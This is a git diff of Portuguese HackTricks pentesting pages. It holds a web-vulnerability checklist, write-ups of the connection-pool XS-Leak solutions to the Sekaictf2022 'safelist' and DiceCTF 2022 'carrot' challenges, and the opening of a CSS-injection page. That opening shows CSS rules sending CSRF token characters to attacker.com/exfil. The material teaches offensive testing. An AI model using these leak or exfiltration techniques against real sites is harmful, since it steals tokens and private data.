* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
Em cada teste de penetração web, existem **vários lugares ocultos e óbvios que podem ser vulneráveis**. Este post serve como uma lista de verificação para confirmar que você procurou por vulnerabilidades em todos os lugares possíveis.
Em todo Pentest Web, existem **vários locais ocultos e óbvios que podem ser vulneráveis**. Este post destina-se a ser uma lista de verificação para confirmar que você procurou por vulnerabilidades em todos os locais possíveis.
## Proxies
{% hint style="info" %}
Atualmente, **aplicações web** geralmente **usam** algum tipo de **proxy intermediário**, que podem ser (abusados) para explorar vulnerabilidades. Essas vulnerabilidades precisam de um proxy vulnerável para estar em funcionamento, mas geralmente também precisam de alguma vulnerabilidade adicional no backend.
Hoje em dia, **aplicações web** geralmente **usam** algum tipo de **proxies intermediários**, que podem ser (ab)usados para explorar vulnerabilidades. Essas vulnerabilidades precisam de um proxy vulnerável para existir, mas geralmente também precisam de alguma vulnerabilidade adicional no backend.
{% endhint %}
* [ ] [**Abuso de cabeçalhos hop-by-hop**](../abusing-hop-by-hop-headers.md)
* [ ] [**Envenenamento de Cache/Decepção de Cache**](../cache-deception.md)
* [ ] [**HTTP Request Smuggling**](../http-request-smuggling/)
* [ ] [**H2C Smuggling**](../h2c-smuggling.md)
* [ ] [**Inclusão de Lado do Servidor/Inclusão de Lado da Borda**](../server-side-inclusion-edge-side-inclusion-injection.md)
* [ ] [**Descobrindo o Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
* [ ] [**Injeção de Lado do Servidor XSLT**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
* [ ] [**Burlando Proteções de Proxy / WAF**](../proxy-waf-protections-bypass.md)
* [ ] [**Abusando de cabeçalhos hop-by-hop**](../abusing-hop-by-hop-headers.md)
* [ ] [**Envenenamento/Engano de Cache**](../cache-deception.md)
* [ ] [**Contrabando de Requisições HTTP**](../http-request-smuggling/)
* [ ] [**Contrabando H2C**](../h2c-smuggling.md)
* [ ] [**Inclusão no Lado do Servidor/Inclusão no Lado da Borda**](../server-side-inclusion-edge-side-inclusion-injection.md)
* [ ] [**Desvendando o Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
* [ ] [**Injeção no Lado do Servidor XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**Bypass de Proteções de Proxy / WAF**](../proxy-waf-protections-bypass.md)
## **Entrada do usuário**
## **Entrada de usuário**
{% hint style="info" %}
A maioria das aplicações web permitirá que os usuários insiram alguns dados que serão processados posteriormente.\
Dependendo da estrutura dos dados que o servidor espera, algumas vulnerabilidades podem ou não ser aplicáveis.
A maioria das aplicações web **permitirá que os usuários insiram alguns dados que serão processados posteriormente.**\
Dependendo da estrutura dos dados que o servidor está esperando, algumas vulnerabilidades podem ou não se aplicar.
{% endhint %}
### **Valores Refletidos**
Se os dados introduzidos de alguma forma podem ser refletidos na resposta, a página pode ser vulnerável a várias questões.
Se os dados introduzidos de alguma forma puderem ser refletidos na resposta, a página pode ser vulnerável a vários problemas.
* [ ] [**Injeção de Template do Lado do Cliente**](../client-side-template-injection-csti.md)
* [ ] [**Injeção de Comandos**](../command-injection.md)
* [ ] [**Injeção de Template no Lado do Cliente**](../client-side-template-injection-csti.md)
* [ ] [**Injeção de Comando**](../command-injection.md)
* [ ] [**CRLF**](../crlf-0d-0a.md)
* [ ] [**Marcação Pendente**](../dangling-markup-html-scriptless-injection/)
* [ ] [**Inclusão de Arquivo/Travessia de Caminho**](../file-inclusion/)
* [ ] [**Redirecionamento Aberto**](../open-redirect.md)
* [ ] [**Poluição de Protótipo para XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
* [ ] [**Inclusão de Lado do Servidor/Inclusão de Lado da Borda**](../server-side-inclusion-edge-side-inclusion-injection.md)
* [ ] [**Falsificação de Solicitação de Lado do Servidor**](../ssrf-server-side-request-forgery/)
* [ ] [**Injeção de Template do Lado do Servidor**](../ssti-server-side-template-injection/)
* [ ] [**Nabbing de Guia Reverso**](../reverse-tab-nabbing.md)
* [ ] [**Injeção de Lado do Servidor XSLT**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
* [ ] [**Inclusão no Lado do Servidor/Inclusão no Lado da Borda**](../server-side-inclusion-edge-side-inclusion-injection.md)
* [ ] [**Falsificação de Requisição no Lado do Servidor**](../ssrf-server-side-request-forgery/)
* [ ] [**Injeção de Template no Lado do Servidor**](../ssti-server-side-template-injection/)
* [ ] [**Engano de Aba Reversa**](../reverse-tab-nabbing.md)
* [ ] [**Injeção no Lado do Servidor XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**XSS**](../xss-cross-site-scripting/)
* [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md)
* [ ] [**XS-Search**](../xs-search.md)
@ -62,9 +64,9 @@ Algumas das vulnerabilidades mencionadas requerem condições especiais, outras
[pocs-and-polygloths-cheatsheet](../pocs-and-polygloths-cheatsheet/)
{% endcontent-ref %}
### **Funcionalidades de busca**
### **Funcionalidades de Pesquisa**
Se a funcionalidade pode ser usada para pesquisar algum tipo de dado no backend, talvez você possa (abusar) dela para pesquisar dados arbitrários.
Se a funcionalidade puder ser usada para pesquisar algum tipo de dado dentro do backend, talvez você possa (ab)usá-la para pesquisar dados arbitrários.
* [ ] [**Inclusão de Arquivo/Travessia de Caminho**](../file-inclusion/)
* [ ] [**Injeção NoSQL**](../nosql-injection.md)
@ -72,79 +74,82 @@ Se a funcionalidade pode ser usada para pesquisar algum tipo de dado no backend,
* [ ] [**ReDoS**](../regular-expression-denial-of-service-redos.md)
* [ ] [**Injeção SQL**](../sql-injection/)
* [ ] [**Injeção XPATH**](../xpath-injection.md)
### **Formulários, WebSockets e PostMsgs**
Quando um websocket envia uma mensagem ou um formulário permitindo que os usuários realizem ações, podem surgir vulnerabilidades.
Quando um websocket posta uma mensagem ou um formulário permite que os usuários realizem ações, vulnerabilidades podem surgir.
* [ ] [**Cross Site Request Forgery**](../csrf-cross-site-request-forgery.md)
* [ ] [**Roubo de WebSocket entre sites (CSWSH)**](../websocket-attacks.md)
* [ ] [**Vulnerabilidades do PostMessage**](../postmessage-vulnerabilities/)
* [ ] [**Falsificação de Requisição Entre Sites**](../csrf-cross-site-request-forgery.md)
* [ ] [**Sequestro de WebSocket entre sites (CSWSH)**](../websocket-attacks.md)
* [ ] [**Vulnerabilidades PostMessage**](../postmessage-vulnerabilities/)
### **Cabeçalhos HTTP**
Dependendo dos cabeçalhos HTTP fornecidos pelo servidor web, algumas vulnerabilidades podem estar presentes.
* [ ] [**Clickjacking**](../clickjacking.md)
* [ ] [**Burla da Política de Segurança de Conteúdo**](../content-security-policy-csp-bypass/)
* [ ] [**Bypass de Política de Segurança de Conteúdo**](../content-security-policy-csp-bypass/)
* [ ] [**Hacking com Cookies**](../hacking-with-cookies/)
* [ ] [**CORS - Configurações Incorretas e Burla**](../cors-bypass.md)
* [ ] [**CORS - Má Configurações & Bypass**](../cors-bypass.md)
### **Burlas**
### **Bypasses**
Existem várias funcionalidades específicas onde algumas soluções alternativas podem ser úteis para burlá-las.
Existem várias funcionalidades específicas onde alguns métodos alternativos podem ser úteis para contorná-las
* [ ] [**Burla de 2FA/OTP**](../2fa-bypass.md)
* [ ] [**Burla do Processo de Pagamento**](../bypass-payment-process.md)
* [ ] [**Burla de Captcha**](../captcha-bypass.md)
* [ ] [**Burla de Login**](../login-bypass/)
* [ ] [**Bypass de 2FA/OTP**](../2fa-bypass.md)
* [ ] [**Bypass de Processo de Pagamento**](../bypass-payment-process.md)
* [ ] [**Bypass de Captcha**](../captcha-bypass.md)
* [ ] [**Bypass de Login**](../login-bypass/)
* [ ] [**Condição de Corrida**](../race-condition.md)
* [ ] [**Burla de Limite de Taxa**](../rate-limit-bypass.md)
* [ ] [**Burla de Redefinição de Senha Esquecida**](../reset-password.md)
* [ ] [**Bypass de Limite de Taxa**](../rate-limit-bypass.md)
* [ ] [**Bypass de Redefinição de Senha Esquecida**](../reset-password.md)
* [ ] [**Vulnerabilidades de Registro**](../registration-vulnerabilities.md)
### **Objetos Estruturados / Funcionalidades Específicas**
Algumas funcionalidades exigirão que os **dados sejam estruturados em um formato muito específico** (como um objeto serializado de linguagem ou XML). Portanto, é mais fácil identificar se a aplicação pode ser vulnerável, pois precisa processar esse tipo de dado.\
Algumas funcionalidades exigirão que os **dados sejam estruturados em um formato muito específico** (como um objeto serializado de uma linguagem ou XML). Portanto, é mais fácil identificar se a aplicação pode ser vulnerável, pois precisa estar processando esse tipo de dado.\
Algumas **funcionalidades específicas** também podem ser vulneráveis se um **formato específico de entrada for usado** (como Injeções de Cabeçalho de Email).
* [ ] [**Deserialização**](../deserialization/)
* [ ] [**Desserialização**](../deserialization/)
* [ ] [**Injeção de Cabeçalho de Email**](../email-injections.md)
* [ ] [**Vulnerabilidades de JWT**](../hacking-jwt-json-web-tokens.md)
* [ ] [**Entidade XML Externa**](../xxe-xee-xml-external-entity.md)
* [ ] [**Vulnerabilidades JWT**](../hacking-jwt-json-web-tokens.md)
* [ ] [**Entidade Externa XML**](../xxe-xee-xml-external-entity.md)
### Arquivos
Funcionalidades que permitem o envio de arquivos podem ser vulneráveis a vários problemas.\
Funcionalidades que geram arquivos incluindo entrada do usuário podem executar código inesperado.\
Usuários que abrem arquivos enviados por usuários ou gerados automaticamente incluindo entrada do usuário podem ser comprometidos.
Funcionalidades que permitem o upload de arquivos podem ser vulneráveis a vários problemas.\
Funcionalidades que geram arquivos incluindo entrada de usuário podem executar código inesperado.\
Usuários que abrem arquivos carregados por usuários ou gerados automaticamente incluindo entrada de usuário podem ser comprometidos.
* [ ] [**Envio de Arquivos**](../file-upload/)
* [ ] [**Upload de Arquivo**](../file-upload/)
* [ ] [**Injeção de Fórmula**](../formula-csv-doc-latex-ghostscript-injection.md)
* [ ] [**Injeção de PDF**](../xss-cross-site-scripting/pdf-injection.md)
* [ ] [**XSS do Lado do Servidor**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
* [ ] [**Injeção em PDF**](../xss-cross-site-scripting/pdf-injection.md)
* [ ] [**XSS no Lado do Servidor**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
### **Gerenciamento de Identidade Externa**
* [ ] [**OAUTH para Assumir Conta**](../oauth-to-account-takeover.md)
* [ ] [**OAUTH para Tomada de Conta**](../oauth-to-account-takeover.md)
* [ ] [**Ataques SAML**](../saml-attacks/)
### **Outras Vulnerabilidades Úteis**
Essas vulnerabilidades podem ajudar a explorar outras vulnerabilidades.
* [ ] [**Apropriação de Domínio/Subdomínio**](../domain-subdomain-takeover.md)
* [ ] [**Tomada de Domínio/Subdomínio**](../domain-subdomain-takeover.md)
* [ ] [**IDOR**](../idor.md)
* [ ] [**Poluição de Parâmetros**](../parameter-pollution.md)
* [ ] [**Poluição de Parâmetro**](../parameter-pollution.md)
* [ ] [**Vulnerabilidade de Normalização Unicode**](../unicode-injection/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

68
pentesting-web/xs-search/connection-pool-example.md
View file

@ -1,45 +1,47 @@
# Exemplos de Pool de Conexão
# Exemplos de Pool de Conexões
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Sekaictf2022 - safelist
No desafio [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution), [**@Strellic\_**](https://twitter.com/Strellic\_) dá um exemplo de como usar uma **variação** da técnica de **Pool de Conexão** para realizar um **XS-Leak**.
No desafio [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution), [**@Strellic\_**](https://twitter.com/Strellic\_) fornece um exemplo de como usar uma **variação** da técnica **Connection Pool** para realizar um **XS-Leak**.
Neste desafio, o objetivo é extrair uma bandeira que aparecerá na sessão web dos bots dentro de um post. Estes são os recursos que o atacante possui:
Neste desafio, o objetivo é exfiltrar uma flag que aparecerá na sessão web dos bots dentro de um post. Estes são os recursos que o atacante possui:
* O **bot** irá **visitar** uma **URL** fornecida pelo atacante
* O atacante pode **injetar HTML** na página (mas sem JS, o dompurify é usado) abusando de um **CSRF** fazendo com que o **bot crie um post** com esse HTML.
* O atacante pode abusar de um CSRF para fazer com que o **bot** **delete** o **primeiro post** dentro da web.
* Como os **posts** são ordenados **alfabeticamente**, quando o **primeiro post é deletado**, se o conteúdo **HTML** do atacante for **carregado**, significa que ele estava **alfabeticamente antes da bandeira**.
* O atacante pode **injetar HTML** na página (mas não JS, dompurify é usado) abusando de um **CSRF** fazendo o **bot criar um post** com esse HTML.
* O atacante pode abusar de um CSRF para fazer o **bot** **deletar** o **primeiro** **post** dentro da web.
* Como os **posts** são ordenados **alfabeticamente**, quando o **primeiro post é deletado**, se o **conteúdo HTML** do atacante for **carregado** significa que estava **alfabeticamente antes da flag**.
Portanto, para roubar a bandeira, a solução proposta por @Strellyc\_ é, **para cada caractere a ser testado**, fazer com que o bot:
Portanto, para roubar a flag, a solução proposta por @Strellyc\_ é, **para cada caractere a testar**, fazer o bot:
* Crie um **novo post** que **comece** com a parte conhecida da **bandeira** e vários **carregamentos** de **img**.
* **Delete** o **post** na posição **0**.
* Bloqueie 255 sockets.
* Carregue a página com os posts.
* Realize 5 solicitações aleatórias para um site (example.com neste caso) e meça o tempo que isso leva.
* Criar um **novo post** que **começa** com a parte conhecida da **flag** e vários **carregamentos de img**.
* **Deletar** o **post** na posição **0**.
* Bloquear 255 sockets.
* Carregar a página com os posts
* Realizar 5 pedidos aleatórios a um site (example.com neste caso) e medir o tempo que isso leva.
{% hint style="warning" %}
Se o post **deletado** foi a **bandeira**, isso significa que todas as **imagens** **injetadas** no HTML vão **competir** com as **5 solicitações aleatórias** por esse socket **desbloqueado**. O que significa que o tempo medido será maior do que no outro cenário.
Se o **post deletado** foi a **flag**, isso significa que todas as **imagens** **injetadas** no HTML vão estar **disputando** com os **5 pedidos aleatórios** por aquele **socket desbloqueado**. O que significa que o tempo medido vai ser maior do que o outro cenário.
Se o post **deletado** foi o **HTML**, as **5 solicitações aleatórias** serão **mais rápidas** porque elas não precisam competir por esse socket com o HTML injetado.
Se o **post deletado** foi o **HTML**, os **5 pedidos aleatórios** serão **mais rápidos** porque não precisam disputar por aquele socket com o HTML injetado.
{% endhint %}
### Exploit 1
Este é o código de exploração, retirado de [https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html](https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html):
Este é o código do exploit, retirado de [https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html](https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html):
```html
<!-- Form to inject HTML code in the bots page -->
<form method="POST" action="https://safelist.ctf.sekai.team/create" id="create" target="_blank">
@ -170,7 +172,7 @@ pwn();
```
### Exploração 2
A mesma tática, mas com um código diferente de [https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/](https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/)
Mesma tática, mas código diferente de [https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/](https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/)
```html
<!DOCTYPE html>
<html>
@ -294,14 +296,14 @@ resolve(isFound)
```
## DiceCTF 2022 - carrot
Neste caso, o primeiro passo do exploit foi abusar de um CSRF para modificar a página onde a flag está contida, de modo que ela tenha **muito mais conteúdo** (e, portanto, leve mais tempo para carregar), e então **abusar do pool de conexões para medir o tempo necessário para acessar a página** que potencialmente pode ter a flag.
Neste caso, o primeiro passo do exploit foi abusar de um CSRF para modificar a página onde a flag está contida para que ela tenha **muito mais conteúdo** (e, portanto, carregá-la leva mais tempo), e então **abusar do pool de conexões para medir o tempo que leva para acessar a página** que poderia potencialmente ter a flag.
No exploit, você pode ver:
* Abuso de CSRF
* Ocupar todos os sockets, exceto um
* Abusar do CSRF
* Ocupar todos os sockets menos 1
* Calibrar a resposta
* Iniciar a força bruta acessando a página potencial com a flag
* Começar o bruteforce acessando a página potencial com a flag
* A página potencial será acessada e imediatamente uma URL controlada pelo atacante também será acessada para verificar quanto tempo ambas as solicitações levam.
```html
<h1>DiceCTF 2022 web/carrot</h1>
@ -506,12 +508,14 @@ exploit('dice{')
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

182
pentesting-web/xs-search/css-injection/README.md
View file

@ -2,21 +2,23 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Injeção de CSS
### Seletor de Atributos
### Seletor de Atributo
A técnica principal para exfiltrar informações por meio de Injeção de CSS é tentar **corresponder a um texto com CSS** e, caso esse **texto exista**, **carregar algum recurso externo, como:**
A principal técnica para exfiltrar informações via Injeção de CSS é tentar **combinar um texto com CSS** e, caso esse **texto exista**, **carregar algum recurso externo, como:**
```css
input[name=csrf][value^=a]{
background-image: url(https://attacker.com/exfil/a);
@ -29,25 +31,25 @@ input[name=csrf][value^=9]{
background-image: url(https://attacker.com/exfil/9);
}
```
No entanto, observe que essa técnica não funcionará se, no exemplo, a entrada do **nome csrf** for do tipo **hidden** (e geralmente são), porque o plano de fundo não será carregado.\
No entanto, você pode **burlar** esse impedimento, em vez de fazer com que o elemento oculto carregue um plano de fundo, **faça com que qualquer coisa após ele carregue o plano de fundo:**
No entanto, observe que essa técnica não funcionará se, no exemplo, o **csrf name input** for do **tipo hidden** (e geralmente são), porque o fundo não será carregado.\
No entanto, você pode **contornar** esse impedimento fazendo com que, em vez de fazer o elemento oculto carregar um fundo, **simplesmente faça qualquer coisa depois dele carregar o fundo:**
```css
input[name=csrf][value^=csrF] ~ * {
background-image: url(https://attacker.com/exfil/csrF);
}
```
Alguns exemplos de código para explorar isso: [https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e)
Algum exemplo de código para explorar isso: [https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e)
#### Pré-requisitos
1. A injeção de CSS precisa permitir payloads suficientemente longos
2. Capacidade de **enquadrar a página para acionar a reavaliação do CSS dos payloads recém-gerados**
1. A injeção de CSS precisa permitir cargas úteis suficientemente longas
2. Capacidade de **enquadrar a página para disparar a reavaliação de CSS de cargas úteis recém-geradas**
3. Capacidade de usar **imagens hospedadas externamente** (pode ser bloqueado por CSP)
### Seletor de Atributo Cego
